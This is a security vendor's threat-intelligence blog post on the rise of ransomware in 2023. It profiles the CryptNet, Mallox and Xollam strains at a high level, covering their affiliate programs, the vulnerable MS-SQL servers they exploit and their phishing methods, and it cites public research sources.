Context over chaos. Disconnected technologies, siloed data, and reactive processes can only get you so far. Protecting businesses in today’s threat landscape demands more than a set of security tools – it requires context.
That's where Avertium comes in
Security. It’s in our DNA. It’s elemental, foundational. Something that an always-on, everything’s-IoT-connected world depends on.
Helping mid-to-enterprise organizations protect assets and manage risk is our only business. Our mission is to make our customers’ world a safer place so that they may thrive in an always-on, connected world.
Best-in-class technology from our partners... backed by service excellence from Avertium.
Interested in becoming a partner?
With Avertium's deal registration, partners can efficiently and confidently connect with Avertium on opportunities to protect your deals.
Microsoft Copilot for Security analyzes and synthesizes high volumes of security data which can help healthcare cybersecurity teams do more with less.
Dive into our resource hub and explore top
cybersecurity topics along with what we do
and what we can do for you.
Although ransomware appeared to decline towards the end of 2022, there seemed to be an uptick in ransomware attacks during the second quarter of 2023. Research from SonicWall showed a 74% increase in ransomware attacks compared to the first three months of the year. According to findings by SonicWall Capture Labs Threat Researchers, the first quarter of 2023 witnessed a relatively low number of ransomware attacks, totaling 51.2 million incidents. This marked the lowest figure recorded since the fourth quarter of 2019.
In contrast, the second quarter of 2023 experienced a resurgence in ransomware activity, with a substantial increase of 74%, totaling 88.9 million attacks. Nonetheless, the upswing in ransomware attacks observed throughout April, May, and June of 2023 suggests a potential resurgence in attacker activity. The report highlighted this concern, stating, "When considering the monthly patterns, it becomes apparent that ransomware may resurge as we progress through 2023."
In July 2023, Chainalysis found that in the first half of 2023, ransomware attackers made $176 million more than they did during the same period in 2022. This is a reversal of the trend we saw in 2022 when ransomware attacks were decreasing. Now, there are new ransomware strains contributing to the rise of ransomware attacks. CryptNet, Mallox, and Xollam are new strains with operators that have intensified the way they attack, posing new challengers for cybersecurity professionals. Let’s dive into the details of these ransomware strains and explore measures organizations can take to protect themselves.
In May 2023, the threat researchers at ZScaler published technical details about the ransomware strain, CryptNet. The strain emerged in April 2023 and the operators claim to exfiltrate data prior to performing file encryption. According to ZScaler, CryptNet has a data leak site that lists two victims from April 2023. CryptNet appears to be a ransomware-as-a-service (RaaS) operation – recruiting affiliates via criminal forums. [1]Surprisingly, affiliates have the chance of a 90% cut, which is a big jump from the 60-80% share most groups offer.
CryptNet’s attack region is worldwide, and targeted industries include trading companies and distributors, as well as internet software and services. CryptNet promotes itself as high-speed, completely undetectable ransomware, claiming to have the ability to delete shadow copies, perform offline encryption, and disable backup services. The ransomware operators also have a chat panel for ransom negotiations.
ZScaler’s research states that CryptNet uses code that is written in .NET and obfuscated using .Net Reactor. Upon removing the obfuscation layer, it becomes clear that CryptNet bears striking similarities to the Chaos ransomware family, particularly its latest variant, Yashma. These similarities include encryption techniques, the ability to disable backup services, and the deletion of shadow copies, as mentioned above. CryptNet seems to have enhanced the Yashma code, resulting in better file encryption performance.
Image 1: String Decryption Algorithm
Source: ZScaler
[1] CryptNet: Russian ransom gang makes its debut | Cybernews
Despite the researchers successfully removing the obfuscation layer, they encountered a situation where the vital information within the ransomware code remained concealed within a resource section. This section was further protected through encryption using a customized algorithm. Once decrypted, the strings appear to be stored in sequence, with each string preceded by a DWORD value indicating its size.
One of the initial steps carried out by the ransomware involves creating a decryption ID, which is later included in the ransom note. Once CryptNet creates the victim ID, it begins the main encryption process. The ransomware excludes the following directories from encryption:
The following file names are also excluded from encryption:
Here is a sample of file extensions (that have a matching file) CryptNet will encrypt:
The ransom note that CryptNet drops during the encryption process is named RESTORE-FILES-[9 random chars] . txt. See the note below.
Image 2: CryptNet Ransom Note
Source: ZScaler
Furthermore, when the ransomware is executed with administrator privileges, CryptNet will stop a list of services. It also removes Window shadow copies before deleting the backup catalog if the ransomware has administrator privileges. Once a victim enters the Tor site mentioned in the ransom note, a login screen asks them to enter a decryption ID and solve a captcha. Next, a timer is displayed with the option to test file decryption. There is also a chat feature to negotiate ransom payments. The chat feature also provides a link to CryptNet’s data leak site.
Although CryptNet does use the same codebase as the Yashma and Chaos ransomware families, CryptNet lacks some of Yashma’s features which include lack of persistence and language/country restrictions. It’s clear that CryptNet has taken the codebase of Yashma and Chaos and increased the file encryption efficiency.
Mallox ransomware specifically targets computers running Microsoft Windows. This ransomware was first observed in June 2021 and is known for exploiting unsecured MS-SQL servers as a penetration vector to compromise victims’ networks. The ransomware’s targeted industries are manufacturing, professional and legal services, and wholesale and retail. The ransomware operators claim that their victims include worldwide organizations.
According to Lior Rochberger, a senior security researcher at Palo Alto Networks, Mallox’s sudden increase in activity is attributed to the deliberate actions taken by the group's leaders to expand Mallox's operations. Rochberger stated that group appeared to focus more on recruiting affiliates at the beginning of 2023. This shift in strategy explains the significant increase observed this year.
Recently, researchers from Unit 42 have noticed a significant increase in Mallox ransomware activity, with a surge of almost 174% compared to 2022. This increase is primarily due to Mallox using vulnerable MS-SQL (CVE-2020-0618 and CVE-2019-1068) servers to spread the ransomware. Unit 42 also observed Mallox using tactics such as brute force, data exfiltration, and the use of network scanning tools.
Researchers have also reported that the group has attempted to distribute Mallox via phishing emails – suggesting affiliates may be involved. Once the threat actors gain access, they use the command line and PowerShell to download the Mallox ransomware payload from a remote server. Like other ransomware groups, the initial payload tries to deactivate any services that might hinder data encryption on the targeted system. Also, it tries to erase shadow copies, making data recovery more challenging after encryption. The malware also attempts to eliminate all event logs, utilizing a commonly used Microsoft command utility to try and complicate forensic analysis.
Like CryptNet, the threat actors behind Mallox use the double extortion method – stealing data before encrypting it. They also have a data leak site where they leak the data of victims that refuse to pay or negotiate its ransom demands. Victims negotiate with the threat actors by using a private key to authenticate themselves.
As previously stated, the ransomware operators claim to have breached hundreds of organizations worldwide. Unit 42 stated that their telemetry indicates at least dozens of potential Mallox victims. In 2022, Mallox ransomware was discovered to be a variant of the TargetCompany ransomware strain.
Researchers believe that Xollam is also a variant of the TargetCompany ransomware strain due to the operators using similar techniques. According to TrendMicro, in 2023, Xollam was seen using phishing campaigns and Microsoft OneNote files to access and distribute malware - a departure from the TargetCompany and Mallox’s previous focus on exploiting vulnerable MS SQL databases.
According to Trend Micro’s investigation, Xollam employs a pseudo-fileless technique using PowerShell. This involves the execution of reflective loading to download its payload. Trend Micro also observed the technique in earlier variants of the TargetCompany ransomware.
The latest version of the ransomware, Xollam, was found in February of this year. In that same month, the older version of Mallox was also active and was responsible for an attack on the Federation of Indian Chambers of Commerce and Industry (FICCI).
The TargetCompany is known to be a small and closed group. It’s clear that the operation is now exploring new methods and expanding its reach by participating in OneNote phishing campaigns. This shift allows the TargetCompany to target a broader range of potential victims, leading to higher profits.
In just two years of operation, the cybercriminals behind the ransomware have extended their operations by introducing a RaaS affiliate program and maintaining multiple channels to publicize victims and publish stolen data.
Ransomware operations are constantly evolving and adapting their tactics. CryptNet, for instance, evolved from Yashma and streamlined its code for better performance. Mallox shifted from primarily targeting MS SQL databases to using phishing campaigns with OneNote files, showing the desire to diversify their victim base. The evolving tactics, increased modification, and persistence of ransomware groups/strains underscore the ongoing need for robust cybersecurity measures, timely patching, and user education to protect against ransomware threats.
Best practices when that can help protect organizations from ransomware operations like Mallox, Xollam, The TargetCompany, and CryptNet.
CVE-2020-0618
CVE-2019-1068
The TargetCompany/Mallox/Xollam
CryptNet
CryptNet
Mallox
The TargetCompany
Mid-Year Update to the 2023 SonicWall Cyber Threat Report | Threat Intelligence
Ransomware Attacks Skyrocket in Q2 2023 - Infosecurity Magazine (infosecurity-magazine.com)
Mallox Ransomware Group Escalates Cyber Threat with Enhanced Evasion Tactics (speartip.com)
CryptNet: Russian ransom gang makes its debut | Cybernews
Mallox Ransomware Exploits Weak MS-SQL Servers to Breach Networks (thehackernews.com)
Technical Analysis of CryptNet Ransomware - Security Boulevard
KB4535305 - SQL Server Reporting Services remote code execution vulnerability - Microsoft Support
New CryptNet Ransomware-as-a-Service Announced on RAMP | ZeroFox
Mid-Year Update: 2023 SonicWall Cyber Threat Report
PowerPoint Presentation (hivepro.com)
Threat Group Assessment: Mallox Ransomware (paloaltonetworks.com)
Xollam the Latest Face of TargetCompany (trendmicro.com)
Mallox Ransomware Group Activity Shifts Into High Gear (darkreading.com)
Ransomware Spotlight: TargetCompany - Security News (trendmicro.com)
documents.trendmicro.com/assets/txt/ransomware-spotlight-TargetCompany-terminated-IOCs-rwdW7GY.txt
This document and its contents do not constitute, and are not a substitute for, legal advice. The outcome of a Security Risk Assessment should be utilized to ensure that diligent measures are taken to lower the risk of potential weaknesses be exploited to compromise data.
Although the Services and this report may provide data that Client can use in its compliance efforts, Client (not Avertium) is ultimately responsible for assessing and meeting Client's own compliance responsibilities. This report does not constitute a guarantee or assurance of Client's compliance with any law, regulation or standard.